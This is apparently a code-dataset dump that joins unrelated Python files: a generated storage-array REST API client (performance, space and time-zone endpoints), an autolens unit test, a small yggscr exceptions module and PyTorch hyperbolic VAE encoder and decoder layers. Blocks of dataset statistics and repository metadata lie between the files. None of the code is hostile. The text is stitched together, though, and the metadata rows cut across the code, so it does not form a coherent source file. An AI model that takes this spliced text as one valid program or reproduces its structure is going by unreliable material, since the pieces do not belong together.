def api21_arrays_nfs_specific_performance_get_with_http_info(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayNfsSpecificPerformanceGet
"""GET arrays/nfs-specific-performance
List the NFS performance metrics of the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_nfs_specific_performance_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayNfsSpecificPerformanceGet
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_nfs_specific_performance_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_nfs_specific_performance_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_nfs_specific_performance_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/nfs-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayNfsSpecificPerformanceGet',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_patch_with_http_info(
self,
array=None, # type: list
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayResponse
"""PATCH arrays
Modify the general configuration of the array including banner text, array name, NTP servers, and time zone.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_patch_with_http_info(array, async_req=True)
>>> result = thread.get()
:param Array array: (required)
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
# verify the required parameter 'array' is set
if array is None:
raise TypeError("Missing the required parameter `array` when calling `api21_arrays_patch`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'array' in params:
body_params = params['array']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_performance_get_with_http_info(
self,
end_time=None, # type: int
protocol=None, # type: str
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayPerformanceGetResponse
"""GET arrays/performance
Lists the overall performance metrics of the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_performance_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param str protocol: Display the performance of a specified protocol. Valid values are `all`, `HTTP`, `SMB`, `NFS`, and `S3`. If not specified, defaults to `all`, which will provide the combined performance of all available protocols.
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayPerformanceGetResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_performance_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_performance_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_performance_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'protocol' in params:
query_params.append(('protocol', params['protocol']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_performance_replication_get_with_http_info(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
type=None, # type: str
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayPerformanceReplicationGetResp
"""GET arrays/performance/replication
List replication performance metrics.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_performance_replication_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param str type: Display the metric of a specified object type. Valid values are `all`, `file-system`, and `object-store`. If not specified, defaults to `all`.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayPerformanceReplicationGetResp
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_performance_replication_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_performance_replication_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_performance_replication_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'type' in params:
query_params.append(('type', params['type']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/performance/replication', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceReplicationGetResp',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_s3_specific_performance_get_with_http_info(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayS3SpecificPerformanceGetResp
"""GET arrays/s3-specific-performance
List the S3 performance metrics of the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_s3_specific_performance_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayS3SpecificPerformanceGetResp
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_s3_specific_performance_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_s3_specific_performance_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_s3_specific_performance_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/s3-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayS3SpecificPerformanceGetResp',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_space_get_with_http_info(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
type=None, # type: str
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArraySpaceGetResponse
"""GET arrays/space
List available and used storage space on the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_space_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param str type: Display the metric of a specified object type. Valid values are `array`, `file-system`, and `object-store`. If not specified, defaults to `array`.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArraySpaceGetResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_space_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_space_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_space_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'type' in params:
query_params.append(('type', params['type']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/space', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArraySpaceGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_supported_time_zones_get_with_http_info(
self,
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
names=None, # type: List[str]
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArraysSupportedTimeZonesGetResponse
"""GET arrays/supported-time-zones
List supported time zones for the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_supported_time_zones_get_with_http_info(async_req=True)
>>> result = thread.get()
:param str continuation_token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param str filter: Exclude resources that don't match the specified criteria.
:param int limit: Limit the size of the response to the specified number of resources. A `limit` of `0` can be used to get the number of resources without getting all of the resources. It will be returned in the `total_item_count` field. If a client asks for a page size larger than the maximum number, the request is still valid. In that case the server just returns the maximum number of items, disregarding the client's page size request.
:param list[str] names: A comma-separated list of resource names. If there is not at least one resource that matches each of the elements of `names`, then an error is returned.
:param int offset: The offset of the first resource to return from a collection.
:param list[str] sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name). NOTE: If you provide a sort you will not get a `continuation_token` in the response.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArraysSupportedTimeZonesGetResponse
If the method is called asynchronously,
returns the request thread.
"""
if names is not None:
if not isinstance(names, list):
names = [names]
if sort is not None:
if not isinstance(sort, list):
sort = [sort]
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'limit' in params and params['limit'] < 1:
raise ValueError("Invalid value for parameter `limit` when calling `api21_arrays_supported_time_zones_get`, must be a value greater than or equal to `1`")
if 'offset' in params and params['offset'] < 0:
raise ValueError("Invalid value for parameter `offset` when calling `api21_arrays_supported_time_zones_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'continuation_token' in params:
query_params.append(('continuation_token', params['continuation_token']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'offset' in params:
query_params.append(('offset', params['offset']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
collection_formats['sort'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/supported-time-zones', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArraysSupportedTimeZonesGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
| 46.336434
| 449
| 0.641132
| 7,310
| 59,774
| 5.033105
| 0.047059
| 0.018265
| 0.032344
| 0.027397
| 0.919357
| 0.914764
| 0.912291
| 0.908839
| 0.905686
| 0.903675
| 0
| 0.010047
| 0.272326
| 59,774
| 1,289
| 450
| 46.372382
| 0.835824
| 0.375297
| 0
| 0.858247
| 0
| 0.033505
| 0.207992
| 0.044
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01933
| false
| 0
| 0.006443
| 0
| 0.045103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfbaff7d5c4fbb162ed5254a9891033b9b65207c
| 866
|
py
|
Python
|
test_autolens/analysis/test_setup.py
|
Jammy2211/AutoLens
|
bc132a21d1a52248f08f198474e29f985e365d85
|
[
"MIT"
] | 114
|
2018-03-05T07:31:47.000Z
|
2022-03-08T06:40:52.000Z
|
test_autolens/lens/model/test_setup.py
|
Jammy2211/PyAutoLens
|
728100a3bf13f89f35030724aa08593ab44e65eb
|
[
"MIT"
] | 143
|
2018-01-31T09:57:13.000Z
|
2022-03-16T09:41:05.000Z
|
test_autolens/analysis/test_setup.py
|
Jammy2211/AutoLens
|
bc132a21d1a52248f08f198474e29f985e365d85
|
[
"MIT"
] | 33
|
2018-01-31T12:15:57.000Z
|
2022-01-08T18:31:02.000Z
|
import autolens as al
class TestSetupHyper:
def test__hyper_galaxies_names_for_lens_and_source(self):
setup = al.SetupHyper(hyper_galaxies_lens=False, hyper_galaxies_source=False)
assert setup.hyper_galaxies is False
assert setup.hyper_galaxy_names == None
setup = al.SetupHyper(hyper_galaxies_lens=True, hyper_galaxies_source=False)
assert setup.hyper_galaxies is True
assert setup.hyper_galaxy_names == ["lens"]
setup = al.SetupHyper(hyper_galaxies_lens=False, hyper_galaxies_source=True)
assert setup.hyper_galaxies is True
assert setup.hyper_galaxy_names == ["source"]
setup = al.SetupHyper(hyper_galaxies_lens=True, hyper_galaxies_source=True)
assert setup.hyper_galaxies is True
assert setup.hyper_galaxy_names == ["lens", "source"]
| 39.363636
| 86
| 0.714781
| 109
| 866
| 5.348624
| 0.220183
| 0.28988
| 0.219554
| 0.171527
| 0.823328
| 0.777015
| 0.777015
| 0.777015
| 0.777015
| 0.715266
| 0
| 0
| 0.212471
| 866
| 21
| 87
| 41.238095
| 0.854839
| 0
| 0
| 0.2
| 0
| 0
| 0.023669
| 0
| 0
| 0
| 0
| 0
| 0.533333
| 1
| 0.066667
| false
| 0
| 0.066667
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
320447eccb2cacfa63377525dfe40603d20662d7
| 118
|
py
|
Python
|
src/yggscr/exceptions.py
|
architek/yggscr
|
a0130f9374c4e4e3e3f397a8e0588b3852fcba24
|
[
"ISC"
] | 2
|
2019-02-09T03:36:03.000Z
|
2020-09-29T17:04:39.000Z
|
src/yggscr/exceptions.py
|
architek/yggscr
|
a0130f9374c4e4e3e3f397a8e0588b3852fcba24
|
[
"ISC"
] | 6
|
2018-08-05T21:59:22.000Z
|
2019-02-20T20:45:07.000Z
|
src/yggscr/exceptions.py
|
architek/yggscr
|
a0130f9374c4e4e3e3f397a8e0588b3852fcba24
|
[
"ISC"
] | 1
|
2019-04-15T19:24:39.000Z
|
2019-04-15T19:24:39.000Z
|
class YggException(Exception): pass
class LoginFailed(Exception): pass
class TooManyFailedLogins(Exception): pass
| 14.75
| 42
| 0.813559
| 12
| 118
| 8
| 0.5
| 0.40625
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110169
| 118
| 7
| 43
| 16.857143
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
5c584372008a55c56425e2e1241ebac016da0017
| 14,890
|
py
|
Python
|
pvae/models/architectures.py
|
jacv050/capturing-implicit-hierarchical-structure
|
c461f069e058a338ead2520ea9ae0d0fa9ae4f0a
|
[
"MIT"
] | 4
|
2021-11-23T07:24:16.000Z
|
2021-12-13T14:25:25.000Z
|
pvae/models/architectures.py
|
jacv050/capturing-implicit-hierarchical-structure
|
c461f069e058a338ead2520ea9ae0d0fa9ae4f0a
|
[
"MIT"
] | null | null | null |
pvae/models/architectures.py
|
jacv050/capturing-implicit-hierarchical-structure
|
c461f069e058a338ead2520ea9ae0d0fa9ae4f0a
|
[
"MIT"
] | 2
|
2021-12-28T10:27:47.000Z
|
2022-01-24T12:41:59.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from numpy import prod
from pvae.utils import Constants
from pvae.ops.manifold_layers import GeodesicLayer, MobiusLayer, LogZero, ExpZero, GyroplaneConvLayer
def extra_hidden_layer(hidden_dim, non_lin):
return nn.Sequential(nn.Linear(hidden_dim, hidden_dim), non_lin)
class EncLinear(nn.Module):
""" Usual encoder """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso):
super(EncLinear, self).__init__()
self.manifold = manifold
self.data_size = data_size
modules = []
modules.append(nn.Sequential(nn.Linear(prod(data_size), hidden_dim), non_lin))
modules.extend([extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)])
self.enc = nn.Sequential(*modules)
self.fc21 = nn.Linear(hidden_dim, manifold.coord_dim)
self.fc22 = nn.Linear(hidden_dim, manifold.coord_dim if not prior_iso else 1)
def forward(self, x):
e = self.enc(x.view(*x.size()[:-len(self.data_size)], -1))
mu = self.fc21(e) # flatten data
return mu, F.softplus(self.fc22(e)) + Constants.eta, self.manifold
class DecLinear(nn.Module):
""" Usual decoder """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
super(DecLinear, self).__init__()
self.data_size = data_size
modules = []
modules.append(nn.Sequential(nn.Linear(manifold.coord_dim, hidden_dim), non_lin))
modules.extend([extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)])
self.dec = nn.Sequential(*modules)
self.fc31 = nn.Linear(hidden_dim, prod(data_size))
def forward(self, z):
d = self.dec(z)
mu = self.fc31(d).view(*z.size()[:-1], *self.data_size) # reshape data
return mu, torch.ones_like(mu)
class EncWrapped(nn.Module):
""" Usual encoder followed by an exponential map """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso):
super(EncWrapped, self).__init__()
self.manifold = manifold
self.data_size = data_size
modules = []
modules.append(nn.Sequential(nn.Linear(prod(data_size), hidden_dim), non_lin))
modules.extend([extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)])
self.enc = nn.Sequential(*modules)
self.fc21 = nn.Linear(hidden_dim, manifold.coord_dim)
self.fc22 = nn.Linear(hidden_dim, manifold.coord_dim if not prior_iso else 1)
def forward(self, x):
e = self.enc(x.view(*x.size()[:-len(self.data_size)], -1))
mu = self.fc21(e) # flatten data
mu = self.manifold.expmap0(mu)
return mu, F.softplus(self.fc22(e)) + Constants.eta, self.manifold
class DecWrapped(nn.Module):
""" Usual encoder preceded by a logarithm map """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
super(DecWrapped, self).__init__()
self.data_size = data_size
self.manifold = manifold
modules = []
modules.append(nn.Sequential(nn.Linear(manifold.coord_dim, hidden_dim), non_lin))
modules.extend([extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)])
self.dec = nn.Sequential(*modules)
self.fc31 = nn.Linear(hidden_dim, prod(data_size))
def forward(self, z):
z = self.manifold.logmap0(z)
d = self.dec(z)
mu = self.fc31(d).view(*z.size()[:-1], *self.data_size) # reshape data
return mu, torch.ones_like(mu)
class DecGeo(nn.Module):
""" First layer is a Hypergyroplane followed by usual decoder """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
super(DecGeo, self).__init__()
self.data_size = data_size
modules = []
modules.append(nn.Sequential(GeodesicLayer(manifold.coord_dim, hidden_dim, manifold), non_lin))
modules.extend([extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)])
self.dec = nn.Sequential(*modules)
self.fc31 = nn.Linear(hidden_dim, prod(data_size))
def forward(self, z):
d = self.dec(z)
mu = self.fc31(d).view(*z.size()[:-1], *self.data_size) # reshape data
return mu, torch.ones_like(mu)
class EncMob(nn.Module):
""" Last layer is a Mobius layers """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso):
super(EncMob, self).__init__()
self.manifold = manifold
self.data_size = data_size
modules = []
modules.append(nn.Sequential(nn.Linear(prod(data_size), hidden_dim), non_lin))
modules.extend([extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)])
self.enc = nn.Sequential(*modules)
self.fc21 = MobiusLayer(hidden_dim, manifold.coord_dim, manifold)
self.fc22 = nn.Linear(hidden_dim, manifold.coord_dim if not prior_iso else 1)
def forward(self, x):
e = self.enc(x.view(*x.size()[:-len(self.data_size)], -1)) # flatten data
mu = self.fc21(e) # flatten data
mu = self.manifold.expmap0(mu)
return mu, F.softplus(self.fc22(e)) + Constants.eta, self.manifold
class DecMob(nn.Module):
""" First layer is a Mobius Matrix multiplication """
def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
super(DecMob, self).__init__()
self.data_size = data_size
modules = []
modules.append(nn.Sequential(MobiusLayer(manifold.coord_dim, hidden_dim, manifold), LogZero(manifold), non_lin))
modules.extend([extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)])
self.dec = nn.Sequential(*modules)
self.fc31 = nn.Linear(hidden_dim, prod(data_size))
def forward(self, z):
d = self.dec(z)
mu = self.fc31(d).view(*z.size()[:-1], *self.data_size) # reshape data
return mu, torch.ones_like(mu)
